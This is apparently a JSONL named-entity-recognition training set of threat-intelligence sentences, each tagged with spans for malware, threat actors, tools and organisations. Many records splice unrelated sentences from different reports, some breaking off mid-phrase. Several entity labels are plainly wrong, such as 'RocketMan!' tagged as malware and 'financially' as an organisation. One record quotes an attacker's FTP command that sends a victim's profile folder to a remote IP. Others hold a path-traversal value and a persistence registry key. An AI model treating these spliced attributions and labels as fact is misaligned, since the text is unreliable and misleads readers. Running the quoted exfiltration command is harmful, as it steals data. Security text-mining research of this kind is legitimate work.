{"text": "] 91 2020-03-04 http : //ora.carlaarrabitoarchitetto [ . RocketMan!” (probably a reference to Donald Trump’s nickname for Kim Jong Un) and MiamiBeach” serve as the first beacon messages from the victim to the control server . In addition to using PlugX and Poison Ivy ( PIVY ) , both known to be used by the group , they also used a new Trojan called \" ChChes \" by the Japan Computer Emergency Response Team Coordination Center ( JPCERT ) .", "spans": {"MALWARE: RocketMan!”": [[57, 68]], "MALWARE: MiamiBeach”": [[139, 150]], "MALWARE: PlugX": [[247, 252]], "MALWARE: Poison Ivy": [[257, 267]], "MALWARE: PIVY": [[270, 274]], "MALWARE: Trojan": [[337, 343]], "MALWARE: ChChes": [[353, 359]], "ORGANIZATION: Japan Computer Emergency Response Team Coordination Center": [[369, 427]], "ORGANIZATION: JPCERT": [[430, 436]]}, "info": {"id": "cyberner_stix_train_004502", "source": "cyberner_stix_train"}}
{"text": "The operations division , supervised by Major Boris Alekseyevich Antonov , specialized in targeting organizations of intelligence interest through spear-phishing campaigns and the exploitation of stolen credentials .", "spans": {}, "info": {"id": "cyberner_stix_train_004503", "source": "cyberner_stix_train"}}
{"text": "Sending information about the affected device The app receives configuration data from the C & C server , needed for displaying ads , and for stealth and resilience . Today , FireEye Intelligence is releasing a comprehensive report detailing APT41 , a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations . Create a screenshot and uploads it on the C2 .", "spans": {"ORGANIZATION: FireEye": [[175, 182]], "THREAT_ACTOR: APT41": [[242, 247]], "ORGANIZATION: financially": [[357, 368]], "TOOL: C2": [[434, 436]]}, "info": {"id": "cyberner_stix_train_004504", "source": "cyberner_stix_train"}}
{"text": "] orgmediauploader [ . Our observation of Infy 's campaigns , primarily through the lens of spearphishing attacks against Iranian civil society and media organizations , indicates a wandering focus on particular demographics on a strategic basis over time . The registrant supplied “ uglygorilla@163.com ” as an email address . Monitor for any attempts to enable scripts running on a system would be considered suspicious .", "spans": {"ORGANIZATION: civil society": [[130, 143]], "ORGANIZATION: media organizations": [[148, 167]], "EMAIL: uglygorilla@163.com": [[284, 303]], "TOOL: email": [[312, 317]]}, "info": {"id": "cyberner_stix_train_004505", "source": "cyberner_stix_train"}}
{"text": "These loader samples all had compilation timestamps purporting to be from the 24th or the 25th of September , 2001 .", "spans": {"TOOL: loader": [[6, 12]]}, "info": {"id": "cyberner_stix_train_004506", "source": "cyberner_stix_train"}}
{"text": "Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent . It is not the first time Turla has used generic tools .", "spans": {"THREAT_ACTOR: CopyKittens": [[31, 42]], "TOOL: Metasploit": [[47, 57]], "TOOL: Mimikatz": [[180, 188]], "TOOL: Empire": [[255, 261]], "TOOL: PowerShell": [[266, 276]], "THREAT_ACTOR: Turla": [[339, 344]], "MALWARE: generic tools": [[354, 367]]}, "info": {"id": "cyberner_stix_train_004507", "source": "cyberner_stix_train"}}
{"text": "Of these , the crucial one is the presence of PDB strings in the MiniDuke exploits .", "spans": {"TOOL: PDB": [[46, 49]], "MALWARE: MiniDuke": [[65, 73]]}, "info": {"id": "cyberner_stix_train_004508", "source": "cyberner_stix_train"}}
{"text": "Therefore sending the file path “ ..\\..\\ secret_info.doc ”", "spans": {"FILEPATH: ..\\..\\ secret_info.doc": [[34, 56]]}, "info": {"id": "cyberner_stix_train_004509", "source": "cyberner_stix_train"}}
{"text": "Based on the campaign identifiers found in PinchDuke samples discovered from 2009 , the targets of the Dukes group during that year included organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and Uganda .", "spans": {"MALWARE: PinchDuke": [[43, 52]], "THREAT_ACTOR: Dukes": [[103, 108]], "ORGANIZATION: Ministry of Defense": [[167, 186]]}, "info": {"id": "cyberner_stix_train_004510", "source": "cyberner_stix_train"}}
{"text": "Users should adopt best practices , while organizations should ensure that they balance the need for mobility and the importance of security . In August 2017 , the National Bank of Ukraine warned state-owned and private banks across the country about a large-scale phishing attack . The link between these threat actors and FIN7 is still weak , but we decided to disclose a few hints regarding these in this blog post . Tarrask is able to create \" hidden \" scheduled tasks by deleting the Security Descriptor ( SD ) registry value.[9 ] WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide it 's attempts to elevate privileges through IFileOperation .", "spans": {"ORGANIZATION: National Bank": [[164, 177]], "ORGANIZATION: private banks": [[212, 225]], "THREAT_ACTOR: FIN7": [[324, 328]], "TOOL: Tarrask": [[420, 427]], "MALWARE: WarzoneRAT": [[536, 546]]}, "info": {"id": "cyberner_stix_train_004511", "source": "cyberner_stix_train"}}
{"text": "Lookout customers are also protected from this threat on both Android and iOS . Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "SYSTEM: Android": [[62, 69]], "SYSTEM: iOS": [[74, 77]], "THREAT_ACTOR: Lotus Blossom": [[80, 93]], "VULNERABILITY: CVE-2014-6332": [[115, 128]], "MALWARE: Tran Duy Linh": [[199, 212]], "VULNERABILITY: CVE-2012-0158": [[215, 228]], "VULNERABILITY: exploit": [[229, 236]]}, "info": {"id": "cyberner_stix_train_004512", "source": "cyberner_stix_train"}}
{"text": ". McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications . Later at 6:56 , the attackers exfiltrated data using this FTP tool to a remote host: JsuObf.exe Nup#Tntcommand -s CSIDL_PROFILE\\appdata\\roaming\\adobe\\rar -a ftp://89.34.237.118:2020 -f/[REDACTED]-u[REDACTED]-p[REDACTED] . Between Jan. 1 – June 20 , 2023 , Mandiant identified more than 500 distinct victims that the KillNet collective has allegedly targeted with DDoS attacks .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[2, 33]], "ORGANIZATION: critical infrastructure": [[145, 168]], "ORGANIZATION: entertainment": [[171, 184]], "ORGANIZATION: finance": [[187, 194]], "ORGANIZATION: health care": [[197, 208]], "ORGANIZATION: telecommunications": [[215, 233]], "TOOL: FTP": [[294, 297]], "FILEPATH: JsuObf.exe": [[321, 331]]}, "info": {"id": "cyberner_stix_train_004513", "source": "cyberner_stix_train"}}
{"text": "APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored . Since January 2013 , we've been on the lookout for a possible RedOctober comeback .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: aerospace": [[48, 57]], "ORGANIZATION: energy": [[62, 68]], "THREAT_ACTOR: threat actor": [[137, 149]], "THREAT_ACTOR: RedOctober": [[250, 260]]}, "info": {"id": "cyberner_stix_train_004514", "source": "cyberner_stix_train"}}
{"text": "First , it will get the “ nativenumber ” variable from the “ telmark ” value of “ AndroidManifest.xml ” . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . In May 2016 , both PROMETHIUM and NEODYMIUM were observed to launch attack campaigns .", "spans": {"SYSTEM: AndroidManifest.xml": [[82, 101]], "THREAT_ACTOR: TG-3390": [[122, 129]], "VULNERABILITY: CVE-2011-3544": [[144, 157]], "TOOL: HTTPBrowser backdoor": [[225, 245]], "VULNERABILITY: CVE-2010-0738": [[252, 265]], "TOOL: JBoss": [[287, 292]], "THREAT_ACTOR: PROMETHIUM": [[427, 437]], "THREAT_ACTOR: NEODYMIUM": [[442, 451]]}, "info": {"id": "cyberner_stix_train_004515", "source": "cyberner_stix_train"}}
{"text": "Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics .", "spans": {"VULNERABILITY: CVE-2017-11882": [[37, 51]], "THREAT_ACTOR: actors": [[86, 92]], "VULNERABILITY: (CVE-2017-11882)": [[146, 162]], "MALWARE: SYSCON": [[309, 315]], "FILEPATH: malicious Word documents": [[344, 368]]}, "info": {"id": "cyberner_stix_train_004516", "source": "cyberner_stix_train"}}
{"text": "David Manouchehri released the information about the backdoor through its own Github account ( Pastebin ) and then apparently deleted it . we detected an ongoing campaign targeting a national data center . The Winnti malware was also found at these universities a few weeks prior to ShadowPad . In addition , individuals like Hack520 prove that these threat actors are composed of varied individuals who have their own set of expertise .", "spans": {"ORGANIZATION: Github": [[78, 84]], "ORGANIZATION: Pastebin": [[95, 103]], "MALWARE: The Winnti malware": [[206, 224]], "MALWARE: ShadowPad": [[283, 292]], "THREAT_ACTOR: Hack520": [[326, 333]]}, "info": {"id": "cyberner_stix_train_004517", "source": "cyberner_stix_train"}}
{"text": "This intelligence has been critical to protecting and informing our clients , exposing this threat and strengthening our confidence in attributing APT28 to the Russian government . For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": {"THREAT_ACTOR: APT28": [[147, 152]], "ORGANIZATION: Russian government": [[160, 178]], "MALWARE: FrozenCell": [[213, 223]], "MALWARE: Tawjihi 2016": [[250, 262]], "ORGANIZATION: students": [[296, 304]]}, "info": {"id": "cyberner_stix_train_004518", "source": "cyberner_stix_train"}}
{"text": "The beginning of 2017 also brought a turning point in INDRIK SPIDER 's operation of Dridex . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[54, 67]], "TOOL: Dridex": [[84, 90]], "VULNERABILITY: exploit": [[143, 150]], "VULNERABILITY: CVE-2018-8120": [[156, 169]], "MALWARE: UACME": [[173, 178]]}, "info": {"id": "cyberner_stix_train_004519", "source": "cyberner_stix_train"}}
{"text": "What follows are some of the features exhibited by SpyNote RAT . In addition , Silence downloads the reverse proxy programs Silence.ProxyBot and Silence. ProxyBot.NET , which are described in detail in the report Silence: moving into the darkside . The Cobalt group 's traditional \" stomping grounds \" are the Eastern Europe , Central Asia , and Southeast Asia .", "spans": {"MALWARE: SpyNote RAT": [[51, 62]], "THREAT_ACTOR: Silence": [[79, 86]], "TOOL: Silence.ProxyBot": [[124, 140]], "TOOL: Silence. ProxyBot.NET": [[145, 166]], "THREAT_ACTOR: Cobalt group": [[253, 265]]}, "info": {"id": "cyberner_stix_train_004520", "source": "cyberner_stix_train"}}
{"text": "2016 From mid-2016 on , the cybercriminals returned to dynamic generation of lowest-level domains . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) . Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others .", "spans": {"MALWARE: Zawgyi_Keyboard_L.zip": [[124, 145]], "MALWARE: setup.exe": [[169, 178]], "TOOL: Elise": [[239, 244]], "MALWARE: wincex.dll": [[247, 257]], "MALWARE: WannaCry": [[381, 389]], "MALWARE: WCry": [[396, 400]], "MALWARE: WanaCrypt0r": [[408, 419]], "ORGANIZATION: telecommunications": [[597, 615]], "ORGANIZATION: shipping": [[618, 626]], "ORGANIZATION: car manufacturers": [[629, 646]], "ORGANIZATION: universities": [[649, 661]], "ORGANIZATION: health care industries": [[666, 688]]}, "info": {"id": "cyberner_stix_train_004521", "source": "cyberner_stix_train"}}
{"text": "We don't know how OurMine managed to access WikiLeaks 's DNS records , but past experience has shown that their typical modus operandi is simply to log in using their victim 's password . Silence 's main targets are located in Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan .", "spans": {"ORGANIZATION: WikiLeaks": [[44, 53]]}, "info": {"id": "cyberner_stix_train_004522", "source": "cyberner_stix_train"}}
{"text": "Multinational , multi-industry companies involved in the manufacture of textiles , chemicals , and electronics .", "spans": {"ORGANIZATION: Multinational": [[0, 13]], "ORGANIZATION: multi-industry companies involved in the manufacture of textiles": [[16, 80]], "ORGANIZATION: chemicals": [[83, 92]], "ORGANIZATION: electronics": [[99, 110]]}, "info": {"id": "cyberner_stix_train_004523", "source": "cyberner_stix_train"}}
{"text": "This approach allows the authors to combine ads from third-party advertising networks with ads they created for their own apps . If KeyBoy is a single component of a larger espionage toolkit , the developers may have realized that this older , static-key based , configuration encoding algorithm was inadvertently providing a link between disparate components of their malware suite . The emails originated from the address dpptccb.dpp@msa.hinet.net , and contained the subject DPP's Contact Information Update . Republican state lawmakers are backing a legal challenge in the court systems to block an Environmental Protection Administration rule that asked local water systems to evaluate their current cybersecurity systems and protections while conducting sanitation surveys .", "spans": {"TOOL: KeyBoy": [[132, 138]], "TOOL: configuration encoding algorithm": [[263, 295]], "TOOL: emails": [[389, 395]], "EMAIL: dpptccb.dpp@msa.hinet.net": [[424, 449]], "ORGANIZATION: Republican state lawmakers": [[513, 539]], "ORGANIZATION: Environmental Protection Administration": [[603, 642]]}, "info": {"id": "cyberner_stix_train_004524", "source": "cyberner_stix_train"}}
{"text": "\" When BLU raised objections , Adups took immediate measures to disable that functionality on BLU phones , '' Adups says . The well-crafted and socially engineered malicious documents then become the first stage of a long and mainly fileless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group . Dark Caracal is threat group that has been attributed to the Lebanese General Directorate of General Security ( GDGS ) and has operated since at least 2012 .", "spans": {"ORGANIZATION: BLU": [[7, 10], [94, 97]], "ORGANIZATION: Adups": [[31, 36]], "MALWARE: POWERSTATS": [[281, 291]], "MALWARE: PowerShell backdoor": [[306, 325]], "THREAT_ACTOR: threat group": [[334, 346]], "THREAT_ACTOR: Dark Caracal": [[349, 361]], "ORGANIZATION: General Directorate of General Security": [[419, 458]], "ORGANIZATION: GDGS": [[461, 465]]}, "info": {"id": "cyberner_stix_train_004525", "source": "cyberner_stix_train"}}
{"text": "The threat then executes “ svchost.exe ” , a PE file , which is actually a clean tool known as OLEVIEW.EXE .", "spans": {"FILEPATH: svchost.exe": [[27, 38]], "TOOL: PE": [[45, 47]], "FILEPATH: OLEVIEW.EXE": [[95, 106]]}, "info": {"id": "cyberner_stix_train_004526", "source": "cyberner_stix_train"}}
{"text": "What makes SeaDuke special is that it was written in Python and designed to work on both Windows and Linux systems ; it is the first cross-platform tool we have seen from the Dukes .", "spans": {"MALWARE: SeaDuke": [[11, 18]], "TOOL: Python": [[53, 59]], "SYSTEM: Windows": [[89, 96]], "SYSTEM: Linux": [[101, 106]], "THREAT_ACTOR: Dukes": [[175, 180]]}, "info": {"id": "cyberner_stix_train_004527", "source": "cyberner_stix_train"}}
{"text": "The Poseidon Group has been active , using custom code and evolving their toolkit since at least 2005 . These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions .", "spans": {"THREAT_ACTOR: Poseidon Group": [[4, 18]], "TOOL: custom code": [[43, 54]]}, "info": {"id": "cyberner_stix_train_004528", "source": "cyberner_stix_train"}}
{"text": "Security analysts are typically equipped with the tools to defeat a good number of similar tricks during malware investigations . A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label \" the Lotus Blossom Operation \" , likely named for the debug string present in much of the \" Elise \" codebase since at least 2012 : \" d:\\lstudio\\projects\\lotus\\… \" . DownUrlFile DownRunUrlFile RunUrlBinInMem UnInstall . All companies are subject to these .", "spans": {"ORGANIZATION: Palo Alto Networks": [[174, 192]], "TOOL: Elise": [[343, 348]], "ORGANIZATION: companies": [[474, 483]]}, "info": {"id": "cyberner_stix_train_004529", "source": "cyberner_stix_train"}}
{"text": "Advertisement The VM also disguises the malicious activity , making it easier for the apps to infiltrate Google Play . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa . AutoIt backdoor : A custom built backdoor written in the AutoIt scripting language . Or , they may go up against groups whose ideologies do not align with their own .", "spans": {"SYSTEM: Google Play": [[105, 116]], "MALWARE: DeltaAlfa": [[133, 142]], "TOOL: DDoS bot": [[155, 163]], "MALWARE: AutoIt backdoor": [[192, 207]], "ORGANIZATION: groups whose ideologies do not align with their own": [[305, 356]]}, "info": {"id": "cyberner_stix_train_004530", "source": "cyberner_stix_train"}}
{"text": "We cannot confirm how the initial credentials were stolen in the 2016 incident ; however , later in the intrusion , Responder was deployed .", "spans": {"TOOL: Responder": [[116, 125]]}, "info": {"id": "cyberner_stix_train_004531", "source": "cyberner_stix_train"}}
{"text": "Threat actors are increasingly focused on gaining control of legitimate credentials , especially credentials associated with highly privileged accounts .", "spans": {}, "info": {"id": "cyberner_stix_train_004532", "source": "cyberner_stix_train"}}
{"text": "Netview — This tool enumerates networks .", "spans": {"TOOL: Netview": [[0, 7]]}, "info": {"id": "cyberner_stix_train_004533", "source": "cyberner_stix_train"}}
{"text": "Add the layer of encryption that the SMTPS and POP3S protocols provide to the legitimate web-based service and you have a very difficult C2 channel to block While Sofacy ’s campaign delivering Zebrocy and Cannon remains active , Palo Alto Networks customers are protected from this threat in the following ways :", "spans": {"TOOL: C2": [[137, 139]], "THREAT_ACTOR: Sofacy": [[163, 169]], "MALWARE: Zebrocy": [[193, 200]], "MALWARE: Cannon": [[205, 211]], "ORGANIZATION: Palo Alto Networks": [[229, 247]]}, "info": {"id": "cyberner_stix_train_004534", "source": "cyberner_stix_train"}}
{"text": "This malware-life-cycle has been observed to reoccur every few years , bringing new malware families into light . They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": {"THREAT_ACTOR: They": [[114, 118]], "ORGANIZATION: military": [[160, 168]], "MALWARE: WHITEOUT": [[324, 332]], "MALWARE: Contopee": [[339, 347]], "THREAT_ACTOR: APT38": [[374, 379]], "ORGANIZATION: bank": [[437, 441]]}, "info": {"id": "cyberner_stix_train_004535", "source": "cyberner_stix_train"}}
{"text": "Reverse shell payload The reverse shell module is an external ELF file compiled by the attackers to run on Android . OceanLotus have been actively using since at least early 2018 . TA459 is a threat group believed to operate out of China that has targeted countries including Russia , Belarus , Mongolia , and others .", "spans": {"SYSTEM: Android": [[107, 114]], "THREAT_ACTOR: OceanLotus": [[117, 127]], "THREAT_ACTOR: TA459": [[181, 186]]}, "info": {"id": "cyberner_stix_train_004536", "source": "cyberner_stix_train"}}
{"text": "Knowledge of the threat landscape and implementation of the right detection tools remains crucial to be able to protect yourself from fraud ; Cerberus is yet a new Trojan active in the wild ! AdroMut downloads the malware ServHelper and FlawedAmmy RAT used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor . Several xxmm samples analyzed by CTU researchers incorporate Mimikatz , allowing BRONZE BUTLER to issue Mimikatz commands directly from xxmm .", "spans": {"MALWARE: Cerberus": [[142, 150]], "TOOL: ServHelper": [[222, 232]], "TOOL: FlawedAmmy": [[237, 247]], "THREAT_ACTOR: SectorJ04": [[264, 273]], "ORGANIZATION: CTU": [[396, 399]], "MALWARE: Mimikatz": [[424, 432], [467, 475]], "THREAT_ACTOR: BRONZE BUTLER": [[444, 457]]}, "info": {"id": "cyberner_stix_train_004537", "source": "cyberner_stix_train"}}
{"text": "IOCs for this version were :", "spans": {"TOOL: IOCs": [[0, 4]]}, "info": {"id": "cyberner_stix_train_004538", "source": "cyberner_stix_train"}}
{"text": "The DLL acts as a stub loader , which loads and executes the shell code .", "spans": {"TOOL: DLL": [[4, 7]], "TOOL: loader": [[23, 29]]}, "info": {"id": "cyberner_stix_train_004539", "source": "cyberner_stix_train"}}
{"text": "In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The main targets seem to be US companies in engineering , transport and defense , although it has targeted other organizations around the world .", "spans": {"TOOL: NetTraveler": [[38, 49]], "VULNERABILITY: CVE-2012-0158": [[71, 84]], "TOOL: NetTraveler Trojan": [[100, 118]], "ORGANIZATION: engineering": [[165, 176]], "ORGANIZATION: transport": [[179, 188]], "ORGANIZATION: defense": [[193, 200]]}, "info": {"id": "cyberner_stix_train_004540", "source": "cyberner_stix_train"}}
{"text": "We have found another instance of malware posing as the Super Mario Run Android app , and this time it has taken the form of DroidJack RAT ( remote access trojan ) . Multiple China-based cyber threat groups have targeted international media organizations in the past . Initial reports of the attacks , published April 26 ( in Hebrew ) by the Israel National Cyber Event Readiness Team ( CERT-IL ) and The Marker , confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel . Indicators can be automatically sent to your security tools , like secure email gateway and firewalls , to respond and block threats in realtime .", "spans": {"SYSTEM: Super Mario Run": [[56, 71]], "SYSTEM: Android": [[72, 79]], "MALWARE: DroidJack RAT": [[125, 138]], "THREAT_ACTOR: cyber threat groups": [[187, 206]], "ORGANIZATION: international media organizations": [[221, 254]], "ORGANIZATION: Israel National Cyber Event Readiness Team": [[342, 384]], "ORGANIZATION: CERT-IL": [[387, 394]], "ORGANIZATION: Marker": [[405, 411]], "TOOL: email": [[472, 477]], "ORGANIZATION: Ben-Gurion University": [[490, 511]], "TOOL: security tools": [[602, 616]], "TOOL: secure email gateway": [[624, 644]], "TOOL: firewalls": [[649, 658]]}, "info": {"id": "cyberner_stix_train_004541", "source": "cyberner_stix_train"}}
{"text": "So I don ’ t know what kind of files will be executed , but they could be malicious or advertising files . In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities . APT1 is a single organization of operators that has conducted a cyber espionage campaign against a broad range of victims since at least 2006 . The final stage backdoor connects to two servers , one in Panama and one in Turkey to receive the instructions from the attackers .", "spans": {"TOOL: Octopus": [[172, 179]], "ORGANIZATION: diplomatic entities": [[200, 219]], "THREAT_ACTOR: APT1": [[222, 226]], "THREAT_ACTOR: attackers": [[486, 495]]}, "info": {"id": "cyberner_stix_train_004542", "source": "cyberner_stix_train"}}
{"text": "Key : HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleIndexer Value : %AppData%\\Platform\\sslwin.exe .", "spans": {"FILEPATH: %AppData%\\Platform\\sslwin.exe": [[79, 108]]}, "info": {"id": "cyberner_stix_train_004543", "source": "cyberner_stix_train"}}
{"text": "Logs collected by Check Point researchers show that every day Gooligan installs at least 30,000 apps fraudulently on breached devices or over 2 million apps since the campaign began . Remexi is a basic back door Trojan that allows Cadelle to open a remote shell on the computer and execute commands . The global variable value dword_72DBB588 is always 0 because the value is not initialized ( we can check it by is_loaded API ) This markup becomes unescaped , causing arbitrary markup to be injected into the document .", "spans": {"ORGANIZATION: Check Point": [[18, 29]], "MALWARE: Gooligan": [[62, 70]], "TOOL: Remexi": [[184, 190]], "THREAT_ACTOR: Cadelle": [[231, 238]], "TOOL: is_loaded API": [[412, 425]], "VULNERABILITY: This markup becomes unescaped , causing arbitrary markup to be injected into the document": [[428, 517]]}, "info": {"id": "cyberner_stix_train_004544", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : d30b8468d16b631cafe458fd94cc3196 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "FILEPATH: d30b8468d16b631cafe458fd94cc3196": [[11, 43]]}, "info": {"id": "cyberner_stix_train_004545", "source": "cyberner_stix_train"}}
{"text": "During our extended threat hunting , we uncovered 11 apps on the Google Play store that contain a malicious yet dormant SDK related to “ Agent Smith ” actor . In this blog post , we discussed two separate malware variations that behave in very similar ways and use similar techniques to acquire a C2 address , with both using Yahoo Answers and Quora to evade traditional mechanisms for blocking command and control domains . Dexphot : aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152 . Regardless of which side of the political spectrum you fall , cybersecurity should be something our lawmakers can all agree on .", "spans": {"SYSTEM: Google Play store": [[65, 82]], "MALWARE: Agent Smith": [[137, 148]], "MALWARE: Dexphot": [[425, 432]], "FILEPATH: aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152": [[435, 499]]}, "info": {"id": "cyberner_stix_train_004546", "source": "cyberner_stix_train"}}
{"text": "Once TERBIUM has a foothold in the organization , its infection chain starts by writing an executable file to disk that contains all the components required to carry out the data-wiping operation . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": {"THREAT_ACTOR: TERBIUM": [[5, 12]], "ORGANIZATION: CSIS": [[248, 252]], "MALWARE: Carbanak": [[286, 294]], "ORGANIZATION: customers": [[324, 333]]}, "info": {"id": "cyberner_stix_train_004547", "source": "cyberner_stix_train"}}
{"text": "Our malware analysts Nikita Buchka and Mikhail Kuzin can easily name 11 families of such Trojans . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015 .", "spans": {"VULNERABILITY: CVE-2012-0158": [[151, 164]], "TOOL: NetTraveler Trojan": [[176, 194]], "THREAT_ACTOR: OilRig": [[218, 224]]}, "info": {"id": "cyberner_stix_train_004548", "source": "cyberner_stix_train"}}
{"text": "Moving laterally through a network relying only on legitimate tools that already exist within the victims ’ systems , at times forgoing their traditional toolset for the duration of the compromise .", "spans": {}, "info": {"id": "cyberner_stix_train_004549", "source": "cyberner_stix_train"}}
{"text": "However it ’ s unclear whether organizations that later reported on ViperRAT performed their own independent research or simply based their content on the original Israeli report . Based on our analysis , we believe that threat actors may compile Windows and Unix based payloads using the same code to deploy Kazuar against both platforms . First , it checks if the DLL is executed as a service . Adversaries may utilize command - line interfaces ( CLIs ) to interact with systems and execute commands .", "spans": {"MALWARE: ViperRAT": [[68, 76]], "ORGANIZATION: Kazuar": [[309, 315]], "TOOL: DLL": [[366, 369]]}, "info": {"id": "cyberner_stix_train_004550", "source": "cyberner_stix_train"}}
{"text": "The threat actors then move quickly to compromise Microsoft Exchange servers and to gain complete control of the target environment .", "spans": {"ORGANIZATION: Microsoft": [[50, 59]], "TOOL: Exchange": [[60, 68]]}, "info": {"id": "cyberner_stix_train_004551", "source": "cyberner_stix_train"}}
{"text": "Its main capabilities include : Stealing personal device information Intercepting SMS messages Recording targeted applications for one-time password ( TAN ) Lockdown of the phone Stealing pictures from the device Self-destruction and removal As banks release more advanced security measures , banking malware evolves to keep up with the perpetual arms race . The exploit installs Silence’s loader , designed to download backdoors and other malicious programs . Instead , OilRig 's attack involved delivering the OopsIE Trojan directly to the victim , most likely using a link in a spear phishing email .", "spans": {"VULNERABILITY: exploit": [[363, 370]], "THREAT_ACTOR: Silence’s": [[380, 389]], "THREAT_ACTOR: OilRig": [[471, 477]], "MALWARE: OopsIE Trojan": [[512, 525]]}, "info": {"id": "cyberner_stix_train_004552", "source": "cyberner_stix_train"}}
{"text": "The targets were similar to a 2015 TG-4127 campaign — individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. and Europe , individuals working in the defense and government supply chain , and authors and journalists — but also included email accounts linked to the November 2016 United States presidential election .", "spans": {"THREAT_ACTOR: TG-4127": [[35, 42]], "TOOL: email": [[298, 303]]}, "info": {"id": "cyberner_stix_train_004553", "source": "cyberner_stix_train"}}
{"text": "jp.co.sagawa.SagawaOfficialApp 佐川急便 Malicious URLs : hxxp : //38 [ . CTU researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government . The send function uses several counters to maintain various pieces of information used to control the flow of . shellcode Download a shellcode and run by injecting it in a target process .", "spans": {"ORGANIZATION: CTU": [[69, 72]], "THREAT_ACTOR: group": [[126, 131]], "MALWARE: shellcode": [[353, 362]]}, "info": {"id": "cyberner_stix_train_004554", "source": "cyberner_stix_train"}}
{"text": "These modules are used to selectively provide CozyDuke with just the functionality deemed necessary for the mission at hand .", "spans": {"MALWARE: CozyDuke": [[46, 54]]}, "info": {"id": "cyberner_stix_train_004555", "source": "cyberner_stix_train"}}
{"text": "The time bomb triggers unpacker thread . We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files .", "spans": {"VULNERABILITY: zero-day": [[95, 103]], "THREAT_ACTOR: TEMP.Reaper": [[151, 162]], "MALWARE: PIVY": [[235, 239]], "FILEPATH: malicious files": [[463, 478]]}, "info": {"id": "cyberner_stix_train_004556", "source": "cyberner_stix_train"}}
{"text": "It is safe to say that today ’ s cybercriminal is no longer a lone hacker but part of a serious business operation . we detected an ongoing campaign targeting a national data center in the Centeral Asia . It is also known for having compromised various targets in the healthcare and education sectors . The attackers first attempted to use the LockBit ransomware but when that was blocked , they resorted to 3AM instead .", "spans": {"THREAT_ACTOR: attackers": [[307, 316]], "MALWARE: LockBit ransomware": [[344, 362]], "MALWARE: 3AM": [[408, 411]]}, "info": {"id": "cyberner_stix_train_004557", "source": "cyberner_stix_train"}}
{"text": "XENOTIME is easily the most dangerous threat activity publicly known .", "spans": {"THREAT_ACTOR: XENOTIME": [[0, 8]]}, "info": {"id": "cyberner_stix_train_004558", "source": "cyberner_stix_train"}}
